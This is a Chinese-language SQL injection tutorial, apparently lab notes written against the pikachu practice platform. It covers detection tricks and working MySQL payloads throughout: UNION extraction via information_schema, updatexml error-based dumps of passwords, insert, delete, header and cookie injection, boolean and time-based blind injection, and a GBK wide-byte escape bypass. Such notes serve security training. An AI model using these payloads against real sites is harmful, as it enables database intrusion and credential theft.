sql注入总结图

写出sql注入原理  

注射式攻击的根源在于，程序命令和用户数据（即用户输入）之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入的数据提交给Web程序，以发号施令，为所欲为(注：注入最终是数据库，与脚本、平台无关)。 总之一句话:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作   例如我们在浏览器中输入URL www.sample.com，由于它只是对页面的简单请求无需对数据库动进行动态请求，所以它不存在SQL Injection，当我们输入www.sample.com?testid=23时，我们在URL中传递变量testid，并且提供值为23，由于它是对数据库进行动态查询的请求（其中?testid＝23表示数据库查询变量），所以我们可以该URL中嵌入恶意SQL语句。 

 2、sql 注入一般在那些地方

 SQL一般注入在web表单提交中 cookie中，http头注入等

 3、注入分为那几类

 数字型注入 字符型注入 搜索型注入 xx型注入

 4、注入提交方式有那些  

ASP：request （全部接受）、request.querystring （接受get）、request.form （接受post）、 request.cookie cookie （接受cookie） PHP: $_REQUEST（全部接受）、$_GET $_POST （接受post）、$_COOKIE（接受cookie）

 手工检测SQL注入点

 最常用的SQL注入点判断方法，是在网站中寻找如下形式的网页链接。http://www.*****.com/***.asp?id=xx (ASP注入)或者下面的链接。http://www.*****.com/***.php?id=xx (php注入)http://www.*****.com/***.jsp?id=xx (jsp注入)http://www.*****.com/***.aspx?id=xx (aspx注入)http://www.*****.com/index.asp?id=8&page=99 (注:注入的时候确认是id参数还是page参数，工具默认只对后面page参数注入，所以要对工具进行配置或者手工调换) http://www.*****.com/index/new/id/8 伪静态http://www. *****.com/index/new/php-8.html伪静态其中的“**”可能是数字，也有可能是字符串，分别被称为整数类型数据和字符型数据。

如何判断某个网页链接是否存在SQL注入漏洞呢?通常有两种检测方法。 

1.“单引号”法第一种检测SQL注入漏洞是否存在的方法是“单引号”法。方法很简单，直接在浏览器地址栏中的网址链接后加上一个单引号，如果页面不能正常显示，浏览器返回一些异常信息，则说明该链接可能存在注入漏洞。 

2. 1=1和1=2法很多时候检测提交包含引号的链接时，会提示非法字符，或者直接不返回任何信息，但这并不等于不存在SQL注入漏洞。此时可使用经典的“1=1和1=2”法进行检测。方法很简单，就是直接在链接地址后分别加上and 1=1和and 1=2进行提交，如果返回不同的页面，那么说明存在SQL注入漏洞。

---

union注入

使用搜索型注入代码完成union注入

union操作符一般与order by语句配合使用

返回pikachu平台，select id,email from member where username='kevin'

union select username,pw from member where id=1;，出现如下报错：

v'union select username,pw from member where id=1#%

因为查询的字段不能超过主查询的字段，这个时候可以在SQL语句后面加order by进行排序，通过这个办法可以判断主查询的字段。

输入a' order by 5#%，你会得到

这说明字段没有5个然后继续往下筛选正确会变成

通过这个简单的办法找到主查询一共有三个字段。之后我们来使用union来做一个SQL语句的拼接。输入构造好的语句a' union select database(),user(),version()#%,反馈如图：

information_schema注入

information_schema数据库是MySQL5.0以上系统自带的数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。通过information_schema注入，我们可以将整个数据库内容全部窃取出来, 使用order by来判断查询的字段。先找出数据库的名称，输入vince' union select database(),user(),3#%得到反馈，判断数据库名称为pikachu。

获取pikachu数据库的表名，输入:u' union select table_schema ,table_name,3 from

information_schema.tables where table_schema='pikachu'#

获取pikachu数据库的字段名，输入：k' union select table_name,column_name,3 from

information_schema.columns where table_name='users'#%

最后获取字段值的内容，输入：kobe'union select username ,password,3 from users#%

基于函数报错注入

1、爆数据库版本信息

k' andupdatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #

2、爆数据库当前用户

k' and updatexml(1,concat(0x7e,(SELECTuser()),0x7e),1)#

3、爆数据库

k' andupdatexml(1,concat(0x7e,(SELECT database()),0x7e),1) #

4、爆表

获取数据库表名，输入：k'and

updatexml(1,concat(0x7e,(select table_name from information_schema.tables where

table_schema='pikachu')),0)#，但是反馈回的错误表示只能显示一行，所以采用limit来一行一行显示

f反馈错误

输入k' and updatexml(1,concat(0x7e,(select

table_name from information_schema.tables where table_schema='pikachu'limit

0,1)),0)#

注意：更改limit后面第一个数字0为第一个表然后依次后推

5、爆字段

获取字段名，输入：k'and updatexml(1,concat(0x7e,(select column_name from information_schema.columnswhere table_name='users'limit2,1)),0)#

原理一样

6、爆字段内容

获取字段内容，输入：k'and  updatexml(1,concat(0x7e,(selectpassword from users limit 0,1)),0)#

insert注入

insert注入，就是前端注册的信息最终会被后台通过insert这个操作插入数据库，后台在接受前端的注册数据时没有做防SQL注入的处理，导致前端的输入可以直接拼接SQL到后端的insert相关内容中，导致了insert注入。一般用于注册

我们通过Burp抓包在用户名输入相关payload，格式如下：

oldboy'or updatexml(1,concat(0x7e,(命令)),0) or'

1. 爆表名

oldboy'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0) or'

2. 爆列名

' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 2,1)),0) or'

3. 爆内容

' or updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or' 等同

' or updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or '1'='1''

dalete注入

一般应用于前后端发贴、留言、用户等相关删除操作，点击删除按钮时可通过Brup Suite抓包，对数据包相关delete参数进行注入，注入方法如下：

delete from message where id=56 or updatexml(2,concat(0x7e,(database())),0)

注意这里要将空格转化为url编码

Http Header注入

先在pikachu平台打开Http Header注入模块，点击提示查看登录帐号和密码，登陆后去BurpSuite中找到登陆地GET请求，把请求发送到Repeater模块中，去除User-Agent：，然后输入' 然后运行后观察MYSQL语法报错然后发现存在SQL注入漏洞。这时候可以设置payload。在User-Agent输入payload Mozilla' or updatexml(1,concat(0x7e,database ()),0) or '

注意：这里可能会抓到两个包

这种包正确的

这种包错误的应为此时还未与数据库连接

抓到包后在User-Agent输入payload Mozilla' orupdatexml(1,concat(0x7e,database ()),0) or '

Cookie注入

Cookie是网站为了识别用户身份来跟踪会话的，虽然Cookie是由后端生成的，但每次页面跳转，后端都回对前端的Cookie的信息进行验证，但如果后端获取Cookie后放在数据库中进行拼接，那么这也将是一个SQL注入点。在 ant[uname]=admin后添加一个’观察反馈的MYSQL的语法报错，发现了存在SQL注入漏洞，在设置Payload 'and updatexml (1,concat(0x7e,database()),0)#,观察报错和之前是否相同。

Boolian(布尔型)盲注

在我们的注入语句被带入数据库查询但却什么都没有返回的情况我们该怎么办？例如应用程序就会返回一个“通用的”的页面，或者重定向一个通用页面（可能为网站首页）。这时，我们之前学习的SQL注入办法就无法使用了。

       盲注，即在SQL注入过程中，SQL语句执行选择后，选择的数据不能回显到前端，我们需要使用一些特殊的方法进行判断或尝试，这个过程称为盲注。

SQL盲注分为三大类：基于布尔型SQL盲注、基于时间型SQL盲注、基于报错型SQL盲注

输入语句select ascii(substr(database(),1,1))>xx;通过对比ascii码的长度，判断出数据库表名的第一个字符。

注:substr()函数

substr(string,start,length)

string(必需)规定要返回其中一部分的字符串。start(必需)规定在字符串的何处开始。length(可选)规定被返回字符串的长度。

       那么通过这个方法，虽然只能通过判断单个字符，我们同样可以使用length来判断表名的长度，判断出长度后就能多次输入payload来爆破出每一个表名的字符。输入语句：select length(database())<xx;判断表名长度为xx。

回到pikachu平台按照之前的逻辑，我们构造语句，如果返回1，那么就会爆出选择的信息，返回0，就会返回 您输入的username不存在！ 。按照之前逻辑，输入sql语句：vince' and

ascii(substr(database(),1,1))=112#，通过这个方法，就能得到后台数据库的名称的第一个字符的ascii码。同之前的办法，我们也可以获得information_schema.tables里的数据。但在实际操作中通常不会使用手动盲注的办法，可以使用sqlmap等工具来增加盲注的效率。

base on time(时间型)盲注

到base on time盲注下，输入上个演示中设置好的payload vince' and ascii(substr(database(),1,1))=112#，返回的信息发现不存在注入点。那这样就不能进行注入了？但其实可以通过后端的执行时间来进行注入。这里会用到的payload: vince' and sleep(x)#

基于时间的延迟，构造一个拼接语句：vince' and

if(substr(database(),1,1)='X' (猜测点)',sleep(10),null#，输入后，如果猜测真确，那么就会响应10秒，如果错误会立刻返回错误。输入：vince' and

if(substr(database(),1,1)='p',sleep(10),null)#,再web控制台下，判断出database的表名的一个字符为p。通过这个办法我们就能逐步向下获取数据。

宽字节注入

当我们把php.ini文件里面的magic_quotes_gqc参数设为ON时，所有的'（单引号），"(双引号)，\(反斜杠)和null字符都会被自动加上一个反斜杠进行转义。还有很多函数有类似的作用如：addslashes()、mysql_escape_string()、mysql_real_escape_string()等，另外还有parse_str()后的变量也受magic_quotes_gpc的影响。目前大多数的主机都打开了这个选项，并且很多程序员也注意使用上面那些函数去过滤变量，这看上去很安全，很多漏洞查找者或者工具遇到这些函数过滤后的变量直接就放弃，但是就在他们放弃的同时也放过很多致命的安全漏洞。

其中\的十六进制是 %5C ，当我们在单引号前面加上%df的时候，最终就会变成運'，如果程序的默认字符集是GBK等宽字节字符集，则MYSQL用GBK的编码时，会认为 %df 是一个宽字符，也就是運，也就是说：%df\’ = %df%5c%27=縗’，有了单引号就好注入了。

' =======>\'单引号转义后占两个字节，所以我们需要通过繁体字%df构造两个字节,最终用運干掉了\，也就是说被運占领了\ 所以最后在页面也不会显示出来.

小提示: 数字和字母占一个字节，汉字占两个字节。